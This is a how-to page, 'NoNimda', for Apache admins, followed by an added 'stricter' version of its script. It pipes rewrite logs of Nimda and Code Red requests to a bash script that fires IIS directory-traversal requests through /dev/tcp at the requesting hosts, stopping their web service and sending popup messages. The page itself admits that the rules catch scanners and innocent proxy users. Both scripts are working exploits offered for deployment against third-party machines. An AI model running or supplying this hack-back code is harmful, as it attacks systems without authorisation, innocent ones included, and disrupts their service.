NoNimda
-------

Tired of all the Code Red and Nimda requests on your webserver? This is for Apache users, and possibly for other webservers.

Before we start: you need a bash built with "sockets" support (the /dev/tcp redirection), so you can open a socket connection from within a shellscript. The method is brute and simple; it is not tested under heavy load yet. (Another version with a C and a Java program is underway.) But we say this: if you can make it simple, DO IT SIMPLE. Almost all people understand shellscript, but not C or Java code.

To set up:

We need to add support for RewriteRules in Apache; the idea is to catch Nimda requests. This is the tricky part: we can never be totally sure whether a request is Nimda or something else, so everything that matches below is treated as infected. Add this in the "### Section 2: 'Main' server configuration" part of httpd.conf, after the ServerAdmin root@localhost line:

    RewriteEngine on
    RewriteCond %{REQUEST_URI} default.ida [OR]
    RewriteCond %{REQUEST_URI} cmd.exe [OR]
    RewriteCond %{REQUEST_URI} root.exe
    RewriteLogLevel 1
    RewriteLog |/tmp/strikeback.sh
    RewriteRule ^.*$ http://www.ing-steen.se [L]

The RewriteConds are not especially intelligently written; they trap everything that contains default.ida, cmd.exe or root.exe anywhere in the URI, so a vulnerability scanner, or a user behind a shared proxy, matches just the same as a worm. You need to activate RewriteLogLevel 1, at least. There are other ways, with maps and so on, but we skip them; keep it simple.

The log is simply piped to our shellscript, at a path where everyone has r-x rights. The shellscript can then deal with the request. This is a rude way to solve this: Apache starts the piped logger once and hands it every rewrite log line, and because strikeback.sh exits after reading one line, Apache has to restart it every time anyone requests something from our webserver. (A script that loops over stdin until EOF is gentler on the server.)

The shellscript strikeback.sh looks like this:

    #!/bin/bash
    # Apache hands us one rewrite log line on stdin. The first word is the
    # remote host; a matched condition is logged as "redirect to ...".
    read URI
    REMOTE=`echo "$URI" | grep -i redirect | cut -d" " -f1`
    if [ -n "$REMOTE" ]; then
        # Ask the infected IIS box to stop its own WWW service, then send a
        # winpopup message to its console. -e makes echo emit real line ends.
        echo -e "GET http://$REMOTE/scripts/..%%35c../winnt/system32/net.exe%20stop%20World%20Wide%20Web%20Publishing%20Service\n\n" > "/dev/tcp/$REMOTE/80"
        echo -e "GET http://$REMOTE/scripts/..%%35c../winnt/system32/net.exe%20send%20127.0.0.1%20Your%20Web-Server%20is%20contaminated%20by%20a%20trojan%20!!\n\n" > "/dev/tcp/$REMOTE/80"
    fi
    echo "$URI" >> /tmp/logtest
    exit 0

We simply read from stdin and cut out the IP/hostname, the first word in the log line, into REMOTE. We only want it when "redirect" is printed in the log, which means the Apache rewrite matched a condition. If REMOTE contains something, we probably have an infected server out there to gently shut down.

We use a regular URL GET pattern with some modifications; you can send more than one. The ones above stop the IIS WWW server in a proper way and send a winpopup message to the administrator. All this is echoed to /dev/tcp/$REMOTE/80, a TCP socket connection to port 80. The log line itself is echoed out to a file, just for logging purposes :-)

Two caveats before you switch this on. REMOTE is taken straight from the log line and put straight into a request and a /dev/tcp path, so the script trusts that the first field is a clean address. And whatever matched the RewriteConds gets these requests fired at it, infected or not; you are sending exploit requests at other people's machines, so be sure that is what you want. Also, if the connect to $REMOTE hangs, the script blocks, and Apache's writes to the log pipe back up once the pipe buffer is full.
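A stricter version of the parsing step, written here as an added example (it is not the page's strikeback.sh): it loops over rewrite log lines until EOF instead of exiting after one, keeps only lines that record the redirect, accepts the remote field only when it consists of host-name characters before putting it into a request or a /dev/tcp path, and builds the request with real CRLF line ends. It assumes Apache 1.3 style RewriteLog output where the first field is the remote host and a match is logged as "redirect to ..."; the sample log lines at the bottom are constructed for the demo, and STRIKEBACK_DRY_RUN and the function names are this example's own.

```bash
#!/bin/bash
# Added example, not the page's strikeback.sh. Assumes Apache 1.3 style
# RewriteLog lines: first field is the remote host, a matched rule is logged
# as "redirect to ...". STRIKEBACK_DRY_RUN=1 (the default) prints the request
# instead of opening a socket, so the demo below never touches the network.

# Print the remote host from one rewrite log line, or nothing if the line is
# not our redirect or the host field contains characters we refuse to put
# into a request or a /dev/tcp path.
extract_remote() {
    local line="$1" remote
    case "$line" in
        *"redirect to "*) ;;
        *) return 0 ;;
    esac
    remote="${line%% *}"
    if printf '%s\n' "$remote" | grep -Eq '^[A-Za-z0-9][A-Za-z0-9.-]*$'; then
        printf '%s' "$remote"
    fi
}

# Write a minimal HTTP/1.0 request with real CRLF line ends. (Plain echo, as
# in the original script, sends the two characters backslash and n.)
build_request() {
    local host="$1" path="$2"
    printf 'GET %s HTTP/1.0\r\nHost: %s\r\n\r\n' "$path" "$host"
}

# Send one request to port 80 on the host. The real send runs in a background
# subshell so a hanging connect cannot block the log pipe Apache writes to.
send_request() {
    local host="$1" path="$2"
    if [ "${STRIKEBACK_DRY_RUN:-1}" = "1" ]; then
        printf 'DRY RUN -> %s:80\n' "$host"
        build_request "$host" "$path"
        return 0
    fi
    ( exec 3<>"/dev/tcp/$host/80" && build_request "$host" "$path" >&3 ) &
}

# Read rewrite log lines until EOF; one decision per line.
process_log() {
    local line remote
    while IFS= read -r line; do
        remote="$(extract_remote "$line")"
        [ -n "$remote" ] || continue
        # The page's "net stop" request, in origin form with a Host header.
        send_request "$remote" \
            '/scripts/..%%35c../winnt/system32/net.exe%20stop%20World%20Wide%20Web%20Publishing%20Service'
    done
}

# Constructed sample lines (not real log output): a match, a request that
# did not match any RewriteCond, and a match whose host field is hostile.
SAMPLE_LOG='10.0.0.5 - - [19/Sep/2001:10:00:00 +0200] [www/sid#1][rid#2/initial] (1) redirect to http://www.ing-steen.se [REDIRECT/302]
192.0.2.9 - - [19/Sep/2001:10:00:01 +0200] [www/sid#1][rid#3/initial] (1) pass through /index.html
evil;host - - [19/Sep/2001:10:00:02 +0200] [www/sid#1][rid#4/initial] (1) redirect to http://www.ing-steen.se [REDIRECT/302]'

# Demo run over the sample lines; only the first one produces a request.
printf '%s\n' "$SAMPLE_LOG" | process_log
```

To hook it up to Apache, replace the demo pipe at the end with a bare call to process_log (so it reads the log lines Apache writes to its stdin), point RewriteLog at it, and set STRIKEBACK_DRY_RUN=0 in its environment once you have watched the dry-run output and are sure you want the requests to go out.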